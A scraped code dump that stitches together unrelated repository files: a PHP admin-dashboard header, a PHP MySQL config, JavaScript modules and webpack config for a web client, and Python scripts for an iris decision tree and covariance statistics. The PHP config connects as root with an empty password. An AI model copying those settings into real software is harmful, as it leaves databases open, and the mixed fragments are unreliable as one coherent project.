<link href="<?php echo $rootsite; ?>assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/css/jquery.dataTables.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/css/datatables.responsive.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/bootstrap-wysihtml5/bootstrap-wysihtml5.css" rel="stylesheet" type="text/css"/>
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/boostrapv3/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<link href="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.css" rel="stylesheet" type="text/css" media="screen"/>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<link href="<?php echo $rootsite; ?>assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/boostrap-slider/css/slider.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/jquery-slider/css/jquery.sidr.light.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/jquery-superbox/css/style.css" rel="stylesheet" type="text/css" media="screen"/>
<!-- END PLUGIN CSS -->
<!-- BEGIN CORE CSS FRAMEWORK -->
<link href="<?php echo $rootsite; ?>assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/animate.min.css" rel="stylesheet" type="text/css"/>
<!-- END CORE CSS FRAMEWORK -->
<!-- BEGIN CSS TEMPLATE -->
<link href="<?php echo $rootsite; ?>assets/css/style.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/responsive.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/css/custom-icon-set.css" rel="stylesheet" type="text/css"/>
<!-- END NEED TO WORK ON -->
</head>
<body class="">
<!-- BEGIN HEADER -->
<div class="header navbar navbar-inverse">
<!-- BEGIN TOP NAVIGATION BAR -->
<div class="navbar-inner">
<!-- BEGIN NAVIGATION HEADER -->
<div class="header-seperation">
<!-- BEGIN MOBILE HEADER -->
<ul class="nav pull-left notifcation-center" id="main-menu-toggle-wrapper" style="display:none">
<li class="dropdown">
<a id="main-menu-toggle" href="#main-menu" class="">
<div class="iconset top-menu-toggle-white"></div>
</a>
</li>
</ul>
<!-- END MOBILE HEADER -->
<!-- BEGIN LOGO -->
<a href="#">
<img src="<?php echo $rootsite; ?>assets/img/logo.png" class="logo" alt="" data-src="<?php echo $rootsite; ?>assets/img/logo.png" data-src-retina="<?php echo $rootsite; ?>assets/img/logo2x.png" width="106" height="21"/>
</a>
<!-- END LOGO -->
<!-- BEGIN LOGO NAV BUTTONS -->
<ul class="nav pull-right notifcation-center">
<li class="dropdown" id="header_task_bar">
<a href="#" class="dropdown-toggle active" data-toggle="">
<div class="iconset top-home"></div>
</a>
</li>
<li class="dropdown" id="header_inbox_bar">
<a href="#" class="dropdown-toggle">
<div class="iconset top-messages"></div>
<span class="badge" id="msgs-badge">2</span>
</a>
</li>
<!-- BEGIN MOBILE CHAT TOGGLER -->
<li class="dropdown" id="portrait-chat-toggler" style="display:none">
<a href="#sidr" class="chat-menu-toggle">
<div class="iconset top-chat-white"></div>
</a>
</li>
<!-- END MOBILE CHAT TOGGLER -->
</ul>
<!-- END LOGO NAV BUTTONS -->
</div>
<!-- END NAVIGATION HEADER -->
<!-- BEGIN CONTENT HEADER -->
<div class="header-quick-nav">
<!-- BEGIN HEADER LEFT SIDE SECTION -->
<div class="pull-left">
<!-- BEGIN SLIM NAVIGATION TOGGLE -->
<ul class="nav quick-section">
<li class="quicklinks">
<a href="#" class="" id="layout-condensed-toggle">
<div class="iconset top-menu-toggle-dark"></div>
</a>
</li>
</ul>
<!-- END SLIM NAVIGATION TOGGLE -->
<!-- BEGIN HEADER QUICK LINKS -->
<ul class="nav quick-section">
<li class="quicklinks"><a href="#" class=""><div class="iconset top-reload"></div></a></li>
<li class="quicklinks"><span class="h-seperate"></span></li>
<li class="quicklinks"><a href="#" class=""><div class="iconset top-tiles"></div></a></li>
<!-- BEGIN SEARCH BOX -->
<li class="m-r-10 input-prepend inside search-form no-boarder">
<span class="add-on"><span class="iconset top-search"></span></span>
<input name="" type="text" class="no-boarder" placeholder="Search Dashboard" style="width:250px;">
</li>
<!-- END SEARCH BOX -->
</ul>
<!-- BEGIN HEADER QUICK LINKS -->
</div>
<!-- END HEADER LEFT SIDE SECTION -->
<!-- BEGIN HEADER RIGHT SIDE SECTION -->
<div class="pull-right">
<div class="chat-toggler">
<!-- BEGIN NOTIFICATION CENTER -->
<a href="#" class="dropdown-toggle" id="my-task-list" data-placement="bottom" data-content="" data-toggle="dropdown" data-original-title="Notifications">
<div class="user-details">
<div class="username">
<!-- <span class="badge badge-important">3</span> --> <?php echo $donnees_login['prenom']; ?><span class="bold"> <?php echo $donnees_login['nom']; ?></span>
</div>
</div>
<div class="iconset top-down-arrow"></div>
</a>
<div id="notification-list" style="display:none">
<div style="width:300px">
<!-- BEGIN NOTIFICATION MESSAGE -->
<div class="notification-messages info">
<div class="user-profile">
<img src="<?php echo $rootsite; ?>assets/img/profiles/d.jpg" alt="" data-src="<?php echo $rootsite; ?>assets/img/profiles/d.jpg" data-src-retina="<?php echo $rootsite; ?>assets/img/profiles/d2x.jpg" width="35" height="35">
</div>
<div class="message-wrapper">
<div class="heading">Nouvelle Version de GESTCO annoncé</div>
<div class="description">La version 2.0.0 de GESTCO est annoncé pour le 15 Avril 2014</div>
<div class="date pull-left">Il y a une minute</div>
</div>
<div class="clearfix"></div>
</div>
<!-- END NOTIFICATION MESSAGE -->
</div>
</div>
<!-- END NOTIFICATION CENTER -->
<!-- BEGIN PROFILE PICTURE -->
<div class="profile-pic">
<img src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" alt="" data-src="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" data-src-retina="<?php echo $rootsite; ?>assets/img/profiles/<?php echo $donnees_login['prenom']; ?>.jpg" width="35" height="35" />
</div>
<!-- END PROFILE PICTURE -->
</div>
<!-- BEGIN HEADER NAV BUTTONS -->
<ul class="nav quick-section">
<!-- BEGIN SETTINGS -->
<li class="quicklinks">
<a data-toggle="dropdown" class="dropdown-toggle pull-right" href="#" id="user-options">
<div class="iconset top-settings-dark"></div>
</a>
<ul class="dropdown-menu pull-right" role="menu" aria-labelledby="user-options">
<li><a href="<?php echo $rootsite; ?>core/user/user-profile.php">Gestion Utilisateur</a></li>
<li class="divider"></li>
<li><a href="logout.php"><i class="fa fa-power-off"></i> Déconnexion</a></li>
</ul>
</li>
<!-- END SETTINGS -->
</ul>
<!-- END HEADER NAV BUTTONS -->
</div>
<!-- END HEADER RIGHT SIDE SECTION -->
</div>
<!-- END CONTENT HEADER -->
</div>
<!-- END TOP NAVIGATION BAR -->
</div>
<!-- END HEADER --><file_sep><?php
//mysql
$host = "localhost";
$user = "root";
$pass = "";
$base = "gestion";
mysql_connect($host,$user,$pass);
mysql_select_db($base);
$rootsite = "http://127.0.0.1/GCO/";
//Formatae Date
date_default_timezone_set('UTC');
$date = date("d-m-Y");
$date_mois = date("m");
$date_mois_deb = "01-".$date_mois."-2014";
$date_mois_fin = "31-".$date_mois."-2014";
//Server
$sql_server = mysql_query("SELECT * FROM server");
$donnee_server = mysql_fetch_array($sql_server);
$error = mysql_error();
?>
|
f2d853feb54e3643f9a509dadcd5daa968205510
|
[
"Markdown",
"PHP"
] | 29
|
Markdown
|
jbabinot/GCO
|
1b9a31686050bf5e3d6ee6044c998ec7ab0b3005
|
fb30a5e056de6de136e6a49f7d94599f1c4ff8d8
|
refs/heads/master
|
<file_sep>import LidFormModel from './lid-form-model';
export default class LidFormRepostModel extends LidFormModel {
constructor(obj = {}){
super(obj);
this.vu = obj.vu || false;
this.certificate = obj.certificate || false;
}
}<file_sep>export default {
siteId: undefined,
commentsDefault: ''
}<file_sep>import PhoneNumber from './PhoneNumber.vue';
export const PhoneNumberCtrl = PhoneNumber;<file_sep>import LidForm from './lid-form-model';
import LidFormRepost from './lid-form-repost-model';
import AuthForm from './auth-form-model';
import Calculator from './calculator-model';
export const LidFormModel = LidForm;
export const LidFormRepostModel = LidFormRepost;
export const AuthFormModel = AuthForm;
export const CalculatorModel = Calculator;<file_sep>export default class Api {
constructor(config = {}){
this._siteId = config.siteId
this._host = process.env.NODE_ENV === 'production' ? 'https://dswp.ru/api/' : 'http://localhost:3000/api/'
}
getUrl(str){
return this._host + this._siteId + '/' + str
}
get(method){
return new Promise((resolve, reject) => {
const url = this.getUrl(method)
const request = new Request(url, {
method:'get',
headers: new Headers({
'Content-Type': 'application/json',
'X-Requested-With': 'XMLHttpRequest'
})
})
fetch(request).then((response) => {
return response.json()
}).then(data => {
resolve(data)
}).catch(error => {
console.log(error)
reject(error)
})
})
}
post(method, data){
return new Promise((resolve, reject) => {
const url = this.getUrl(method)
const request = new Request(url, {
method:'post',
headers: {
'Accept': 'application/json',
'Content-Type': 'application/json',
},
body: JSON.stringify(data)
});
fetch(request).then((response) => {
return response.json()
}).then(data => {
resolve(data)
}).catch(error => {
console.log('err')
console.log(error)
reject(error)
})
})
}
}<file_sep>const path = require('path');
const VueLoaderPlugin = require('vue-loader/lib/plugin');
const ExtractTextPlugin = require("extract-text-webpack-plugin");
module.exports = {
entry: {
'ds-web-platform-client': [
'./src/assets/stylus/common.styl',
'./src/index.js'
],
'theme-svetofor': [
'./src/assets/stylus/theme-svetofor.styl'
]
},
output: {
publicPath: '/dist/',
path: path.resolve(__dirname, 'dist'),
chunkFilename: '[name].js',
library: 'dswpClient',
libraryTarget: 'umd',
umdNamedDefine: true
},
devServer: {
contentBase: path.join(__dirname, 'docs'),
compress: true,
port: 9000
},
plugins: [
new VueLoaderPlugin(),
new ExtractTextPlugin({
filename: '[name].css'
})
],
module: {
rules: [
{
test: /\.vue$/,
use: 'vue-loader'
},
{
test: /\.pug$/,
use: 'pug-plain-loader'
},
{
test: /\.css$/,
use: ExtractTextPlugin.extract({
fallback: 'style-loader',
use: ['css-loader']
})
},
{
test: /\.styl(us)?$/,
use: ExtractTextPlugin.extract({
fallback: 'vue-style-loader',
use: ['css-loader', 'stylus-loader']
})
},
{
test: /\.(png|jpg|gif)$/,
loader: 'file-loader',
options: {
outputPath: 'images',
}
},
{
test: /\.(svg)$/,
loader: 'file-loader',
options: {
outputPath: 'svg',
name: '[name].[ext]'
}
}
]
}
};<file_sep>import configuration from './config'
import Api from './api'
import * as uiComponents from './ui'
import * as uiControls from './ui/controls'
import * as uiTemplates from './ui/templates'
import * as libHelpers from './helpers'
import * as libModels from './models'
import themesArr from './themes'
import moment from 'moment'
export const init = async (params) => {
moment.locale('ru')
if(process.env.NODE_ENV !== 'production'){
console.log('Init (ds-web-platform-client)')
}
config.siteId = params.siteId || undefined
config.commentsDefault = params.commentsDefault || ''
if(window && window.location && window.location.href){
libHelpers.utmHelper.setUtem(window.location.href)
}
return config
}
export const api = (config = configuration) => {
return new Api(config)
}
export const config = configuration
export const ui = uiComponents
export const uiCtrls = uiControls
export const uiTpls = uiTemplates
export const helpers = libHelpers
export const models = libModels
export const themes = themesArr<file_sep>export default class CalculatorModel {
constructor(){
this.selected = {
category: 'category-b',
package: undefined,
packageAdditional: undefined,
akpp: false,
group: undefined
};
}
}<file_sep>import LidForm from './LidFormUi.vue';
import AuthForm from './AuthFormUi.vue';
import Calculator from './CalculatorUi.vue';
import GroupTables from './GroupTablesUi.vue';
import GroupList from './GroupListUi.vue';
import SliderSwiper from './SliderSwiperUi.vue';
import Counters from './CountersUi.vue';
import Instructors from './InstructorsUi.vue';
import Reviews from './ReviewsUi.vue';
export const LidFormUi = LidForm;
export const AuthFormUi = AuthForm;
export const CalculatorUi = Calculator;
export const GroupTablesUi = GroupTables;
export const GroupListUi = GroupList;
export const SliderSwiperUi = SliderSwiper;
export const CountersUi = Counters;
export const InstructorsUi = Instructors;
export const ReviewsUi = Reviews;
|
d9453dbac1f58a6a18d7427b69066d2633f656d9
|
[
"JavaScript"
] | 9
|
JavaScript
|
AntoXaPRO/ds-web-platform-client
|
1a2c3fe58f2cf90ab842c517bbd505c0967afa5d
|
e412c97893c462651bedf90ee87051590c384e64
|
refs/heads/master
|
<repo_name>wahyu6070/kopigo<file_sep>/kopigo.go
package kopigo
import (
"fmt"
)
func hello(){
fmt.Println("hello world")
}
<file_sep>/go.mod
module github.com/wahyu6070/kopigo
go 1.13
|
4bf3a2edf3ad6ab0272bee898ad232a9aaa5d38b
|
[
"Go Module",
"Go"
] | 2
|
Go
|
wahyu6070/kopigo
|
f65266bb91a5e29d88703c5b12e19bd514e63030
|
fd4f29824baa0a3275c0ec102f5783233d114a42
|
refs/heads/main
|
<repo_name>GoncaloNevesCorreia/tic-tac-toe<file_sep>/README.md
# Tic Tac Toe With Socket.IO
Este projeto suporta uma conexão em tempo real entre dois jogadores, com Socket.IO, um chat de conversa e sessões de utilizadores.
<file_sep>/modules/user.js
const fs = require('fs');
class User {
constructor() {
this.users = [];
}
addUser(session_id, temp_session_id) {
const name = "player" + Math.round(Math.random() * 10000);
let user = { session_id, name, temp_session_id, online: false, gamesWon: 0 };
this.users.push(user);
this.updateDBWithMemory();
return user;
}
getUser(session_id) {
return this.users.filter((user) => user.session_id === session_id)[0];
}
removeUser(session_id) {
let user = this.getUser(session_id);
if (user) {
this.users = this.users.filter((user) => user.session_id !== session_id);
}
return user;
}
getUserByCurrent_Session_ID(temp_session_id) {
return this.users.filter((user) => user.temp_session_id === temp_session_id)[0];
};
changeName(userID, name) {
const user = this.getUser(userID);
user.name = name;
this.updateDBWithMemory();
}
updateUserScore(userID) {
const user = this.getUser(userID);
user.gamesWon++;
this.updateDBWithMemory();
}
updateDBWithMemory() {
let data = JSON.stringify(this.users, null, 2);
fs.writeFileSync('users.json', data);
}
syncWithUsersDB() {
fs.readFile('users.json', (err, data) => {
if (err) return;
let pasedData = JSON.parse(data);
this.users = pasedData;
let changes = false;
this.users.forEach(user => {
if (user.online) {
user.online = false;
changes = true;
}
});
if (changes) this.updateDBWithMemory();
})
}
getTopScores(limit) {
let temp_users_array = this.users;
temp_users_array.sort(function(a, b) {
if (a.gamesWon > b.gamesWon) {
return -1;
}
if (a.gamesWon < b.gamesWon) {
return 1;
}
// a must be equal to b
return 0;
});
let response = [];
for (let i = 0; i < temp_users_array.length && i < limit; i++) {
let user = temp_users_array[i];
response.push({
name: user.name,
score: user.gamesWon
})
}
return response;
}
}
module.exports = { User };<file_sep>/Client/js/bot.js
class Bot {
constructor(symbol) {
this.symbol = symbol;
}
makePlay(Game) {
const minimax = (board, depth, isMaximizing) => {
let scores = { draw: 0 };
scores[Game.player1Symbol] = -10;
scores[Game.player2Symbol] = 10;
let result = Game.checkGameState();
if (result !== false) {
if (result === Game.player1Symbol) { // Derrota
return scores[result] - depth;
} else if (result === Game.player2Symbol) {
return scores[result] - depth; // Vitoria
} else { // Empate
return scores[result];
}
}
if (isMaximizing) {
let bestScore = -Infinity; // Get the MAX
for (let x = 0; x < 3; x++) {
for (let y = 0; y < 3; y++) {
// Is the spot available?
if (board[x][y] == Game.untakenSpace) {
board[x][y] = Game.player2Symbol;
let score = minimax(board, depth + 1, false);
board[x][y] = Game.untakenSpace;
bestScore = Math.max(score, bestScore); // Maximizing player
}
}
}
return bestScore;
} else {
let bestScore = Infinity; // Get the MIN
for (let x = 0; x < 3; x++) {
for (let y = 0; y < 3; y++) {
// Is the spot available?
if (board[x][y] == Game.untakenSpace) {
board[x][y] = Game.player1Symbol;
let score = minimax(board, depth + 1, true);
board[x][y] = Game.untakenSpace;
bestScore = Math.min(score, bestScore); // Minimazing player
}
}
}
return bestScore;
}
}
// AI to make its turn
let bestScore = -Infinity;
let move;
for (let x = 0; x < 3; x++) {
for (let y = 0; y < 3; y++) {
// Is the spot available?
if (Game.board[x][y] == Game.untakenSpace) {
Game.board[x][y] = Game.player2Symbol;
let score = minimax(Game.board, 0, false);
Game.board[x][y] = Game.untakenSpace;
if (score > bestScore) {
bestScore = score;
move = { x, y };
}
}
}
}
setTimeout(() => {
Game.storePlay(move.x, move.y, this.symbol);
Game.renderPlays();
Game.hasWinner();
if (Game.isOver) return;
// Next turn
Game.nextTurn();
}, 1000);
}
}
export { Bot };<file_sep>/Client/js/board.js
class Board {
isSpaceUntaken(x, y, GameState) {
return (GameState.board[x][y] === GameState.untakenSpace)
}
isValidID(id) {
if (id !== "" && !isNaN(id) && id.length == 2) {
if (id[0] >= 0 && id[0] <= 2 && id[1] >= 0 && id[1] <= 2) {
return true;
}
}
return false;
}
getCords(event, GameState) {
const space = event.target;
const id = space.id;
if (this.isValidID(id) && this.isSpaceUntaken(id[0], id[1], GameState)) {
return { x: id[0], y: id[1] };
}
return;
}
renderPlays(GameState) {
for (let i = 0; i < GameState.board.length; i++) {
const row = GameState.board[i];
for (let k = 0; k < row.length; k++) {
const cell = row[k];
const spaceID = i.toString() + k.toString();
const space = document.getElementById(spaceID);
if (cell === GameState.playerSymbol) {
space.innerHTML = `<span class="play${GameState.playerSymbol}">${GameState.playerSymbol}</span>`;
} else if (cell === GameState.opponentSymbol) {
space.innerHTML = `<span class="play${GameState.opponentSymbol}">${GameState.opponentSymbol}</span>`;
} else if (cell === GameState.untakenSpace) {
space.innerHTML = '';
}
}
}
}
displaySymbol(symbol) {
const div_Your_Symbol = document.querySelector("div#yourSymbol");
div_Your_Symbol.innerHTML = `<span class="player${symbol}">You are ${symbol}</span>`;
}
displayTurn(GameState) {
const htmlBoard = document.querySelector(".board");
const div_current_turn = document.querySelector("div#gameInfo");
const playerWithTurn = GameState.playerTurn ? 'your' : GameState.opponentSymbol;
const classTurn = GameState.playerTurn ? `player${GameState.playerSymbol}` : `player${GameState.opponentSymbol}`;
div_current_turn.innerHTML = `<span class="${classTurn}">It's ${playerWithTurn} turn!</span>`;
const hasClassName = htmlBoard.classList.contains("notYourTurn");
if (GameState.playerTurn && hasClassName) {
htmlBoard.classList.remove("notYourTurn");
} else if (!GameState.playerTurn && !hasClassName) {
htmlBoard.classList.add("notYourTurn");
}
}
hasWinner(GameState) {
if (GameState.isOver) {
const div_current_turn = document.querySelector("div#gameInfo");
const message = (GameState.winner === "draw") ? "The game ended in a draw." : (GameState.winner === GameState.playerSymbol) ? "<strong>YOU</strong> Win!" : `<strong>${GameState.winner}</strong> Wins!`;
const classWinner = (GameState.winner === GameState.playerSymbol) ? `player${GameState.playerSymbol}Winner` : (GameState.winner === "draw") ? "gameDraw" : `player${GameState.opponentSymbol}Winner`;
div_current_turn.innerHTML = `<span class="${classWinner}">${message}</span>`;
}
}
waitingForOponent() {
const div_game_info = document.querySelector("div#gameInfo");
const div_Your_Symbol = document.querySelector("div#yourSymbol");
div_game_info.innerHTML = "<span class='searching'>Finding a new opponent...</span>";
div_Your_Symbol.innerHTML = "";
}
opponentDisconnected() {
const div_game_info = document.querySelector("div#gameInfo");
const div_Your_Symbol = document.querySelector("div#yourSymbol");
const btnRestartGame = document.querySelector(".restartGame");
div_game_info.innerHTML = "<span class='disconnected'>The opponent has disconnected. :(</span>";
div_Your_Symbol.innerHTML = "";
btnRestartGame.textContent = "Find New Opponent";
}
}
export { Board };<file_sep>/modules/game.js
class CreateGame {
constructor(player1, player2ID, untakenSpace, playAgainstComputer) {
this.player = player1;
this.opponent = player2ID;
this.board = [
[untakenSpace, untakenSpace, untakenSpace],
[untakenSpace, untakenSpace, untakenSpace],
[untakenSpace, untakenSpace, untakenSpace]
];
this.isOver = false;
this.winner = null;
this.playerTurn = true;
this.untakenSpace = untakenSpace;
this.playerSymbol = 'X';
this.opponentSymbol = 'O';
this.playAgainstComputer = playAgainstComputer;
this.messages = [];
}
// Checks the id from Client-Side
isValidCords(x, y) {
if (!isNaN(x) && !isNaN(y) && (x >= 0 && x <= this.board.length - 1) && (y >= 0 && y <= this.board.length - 1)) {
if (this.isSpaceUntaken(x, y))
return true;
}
return false;
}
// Checks if the space is untaken
isSpaceUntaken(x, y) {
return (this.board[x][y] === this.untakenSpace)
}
// Stores play in board
storePlay(x, y, player) {
if (player) {
this.board[x][y] = this.playerSymbol;
} else {
this.board[x][y] = this.opponentSymbol;
}
this.nextTurn();
}
restartBoard() {
// Clear board Array
for (let i = 0; i < this.board.length; i++) {
this.board[i] = [this.untakenSpace, this.untakenSpace, this.untakenSpace];
}
// Restart Game Variables
this.isOver = false;
this.winner = null;
// Generate Random Turn
this.playerTurn = (this.playerSymbol === 'X');
}
checkGameState() {
const hasOpenSpaces = () => {
for (let i = 0; i < this.board.length; i++) {
for (let j = 0; j < this.board.length; j++) {
if (this.board[i][j] == this.untakenSpace) {
return true;
}
}
}
return false;
}
const equals3 = (a, b, c) => {
return a == b && b == c && a != this.untakenSpace;
}
for (let i = 0; i < this.board.length; i++) { // Check for winner in ROWS
if (equals3(this.board[i][0], this.board[i][1], this.board[i][2])) {
// Winner found in ROW
return this.board[i][0];
}
}
for (let i = 0; i < this.board.length; i++) { // Check for winner in COLUMN
if (equals3(this.board[0][i], this.board[1][i], this.board[2][i])) {
// Winner found in COLUMN
return this.board[0][i];
}
}
if (equals3(this.board[0][0], this.board[1][1], this.board[2][2])) { // Check winner in diagonal left to right
// Winner found in diagonal
return this.board[0][0];
}
if (equals3(this.board[0][2], this.board[1][1], this.board[2][0])) { // Check winner in diagonal right to left
// Winner found in diagonal
return this.board[0][2];
}
if (!hasOpenSpaces()) { // Check for DRAW
return 'draw';
}
return false;
}
nextTurn() {
this.playerTurn = !this.playerTurn;
}
hasWinner() {
const gameState = this.checkGameState();
if (gameState !== false) {
this.isOver = true;
this.winner = gameState;
}
}
playsFirst() {
this.playerSymbol = 'X';
this.opponentSymbol = 'O';
this.playerTurn = true;
}
playsSecond() {
this.playerSymbol = 'O';
this.opponentSymbol = 'X';
this.playerTurn = false;
}
storeMessage(message) {
this.messages.push(message);
}
}
module.exports = { CreateGame };<file_sep>/teste.js
const textArea = document.querySelector("#messageInput");
const btnSend = document.querySelector("#idBtnSendMessage");
function sendSpam(text, limit) {
for (let i = 0; i < limit; i++) {
textArea.value = text;
btnSend.click();
}
}
|
97c9926ca2c6c4b51e30d8c2fba8612e39662d0f
|
[
"Markdown",
"JavaScript"
] | 6
|
Markdown
|
GoncaloNevesCorreia/tic-tac-toe
|
8943d72cc4fa22d9dd890a76965c96a438855ed6
|
df763459af20df1fb6efb645ad382427e1ed46d7
|
refs/heads/master
|
<file_sep>import numpy as np
import pandas as pd
import copy
import math
# 计算某一属性中的最大增益的对应的分割点和增益值
def splitpoint_gain(data, ii, Species):
data1 = copy.deepcopy(data)
data1 = data1[data1[:,ii].argsort()]
splitpoint = [] # 切分点的集合
species_num = [] #所有分裂点之前的分类情况
L = len(data1)
n1 = 0
n2 = 0
n3 = 0
for i in range(L - 1):
if data1[i][4] == Species[0]:
n1 += 1
elif data1[i][4] == Species[1]:
n2 += 1
elif data1[i][4] == Species[2]:
n3 += 1
if data1[i][ii] != data1[i + 1][ii]:
point = (data1[i][ii] + data1[i+1][ii]) / 2
splitpoint.append(point)
nn = [n1, n2, n3]
species_num.append(nn)
num = count(data1,Species)
H = 0
for i in range(3):
if num[i]!=0:
H = H - (num[i]/ L) * math.log(num[i] / L,2)
bestpoint = []
gain = 0
for i in range(len(splitpoint)):
species_num1 = species_num[i][0]+species_num[i][1]+species_num[i][2]
species_num2 = L - species_num1
H1 = 0
H2 = 0
for j in range(3):
p1 = species_num[i][j] / species_num1
p2 = (num[j] - species_num[i][j]) / species_num2
if p1!=0:
H1 = H1 - p1 * math.log(p1, 2)
if p2!=0:
H2 = H2 - p2 * math.log(p2, 2)
gain1 = H - (species_num1 / L) * H1 - (species_num2 / L) * H2
if gain1 > gain:
gain = gain1
bestpoint = splitpoint[i]
return bestpoint, gain
# 找所有属性中增益最大的属性
def best_attribute(data,Species):
best_gain = 0
attribute_num = 0
for i in range(4):
splitpoint, gain = splitpoint_gain(data, i, Species)
if gain > best_gain:
best_gain = gain
attribute_num = i
best_splitpoint = splitpoint
return attribute_num,best_splitpoint,best_gain
# 统计数据中三个分类的数量
def count(data,Species):
num1=num2=num3=0
for i in range(len(data)):
if data[i][4] == Species[0]:
num1 = num1 + 1
elif data[i][4] == Species[1]:
num2 = num2 + 1
elif data[i][4] == Species[2]:
num3 = num3 + 1
num=[num1,num2,num3]
return num
# 按照最佳增益分割数据
def splitdata(data,attribute_num,best_splitpoint):
front = []
back = []
for j in range(len(data)):
if data[j][attribute_num] <= best_splitpoint:
front.append(data[j])
else:
back.append(data[j])
left = np.array(front)
right = np.array(back)
return left, right
def decisionTree(data, min_size, min_purity):
Species = ['setosa','versicolor','virginica']
size = len(data)
num = count(data,Species)
purity = max(num)/size
if size <= min_size or purity >= min_purity:
c = Species[np.argmax(num)]
print("该节点是叶子节点 多数属性:"+str(c)+",分类纯度:"+str(purity)+",节点大小:"+str(size))
print("---")
return
attribute_num, best_splitpoint, best_gain = best_attribute(data,Species)
attribute = ['Sepal_Length', 'Sepal_Width', 'Petal_Length','Petal_Width']
print("节点的分裂点:"+str(attribute[attribute_num])+" <= " + str(best_splitpoint)+" 信息增益:"+str(best_gain))
data_left, data_right = splitdata(data, attribute_num, best_splitpoint)
print("节点 "+str(attribute[attribute_num])+" <= " + str(best_splitpoint)+" 的左子树 Ture"+" :")
decisionTree(data_left, min_size, min_purity)
print("节点 "+str(attribute[attribute_num])+" <= " + str(best_splitpoint)+" 的右子树 False"+" :")
decisionTree(data_right, min_size, min_purity)
data = pd.read_csv('iris.txt',
header=None,
skiprows=1,
sep=" ",
usecols=[1,2,3,4,5])
data = np.array(data)
decisionTree(data,5,0.95)
<file_sep># coding=utf-8
import numpy as np
import matplotlib.pyplot as plt
import math
import copy
#读数据
data = np.loadtxt("magic1.txt",
usecols=(0,1,2,3,4,5,6,7,8,9),
unpack=False,
skiprows=0,
delimiter=',')
np.set_printoptions(suppress = True)
m, n = data.shape
#计算多元平均向量
Mean=np.mean(data,0)
print("多元平均向量为:")
print(Mean)
print("------------------------------")
#计算协方差内积
data1 = copy.deepcopy(data)
print("数据中心化:")
for i in range(0,n):
data1[:,i] = data1[:,i] - Mean[i]
print(data1)
data1T = data1.T
Inner = np.dot(data1T,data1)*(1/m)
print("协方差矩阵作为内积:")
print(Inner)
print("------------------------------")
#计算协方差外积
Outer = np.zeros((n,n))
for i in range(0,m):
Outer = Outer + np.outer(data1T[:,i],data1[i])
Outer = Outer/m
print("协方差矩阵作为外积:")
print(Outer)
print("------------------------------")
#相关性
print("属性1和属性2之间夹角的余弦值为:")
cosine = np.dot(data1[:,0],data1[:,1])/(np.linalg.norm(data1[:,0])*np.linalg.norm(data1[:,1]))
print(cosine)
for i in range(m):
plt.plot(data[i, 0], data[i, 1], 'ok' )
plt.title("")
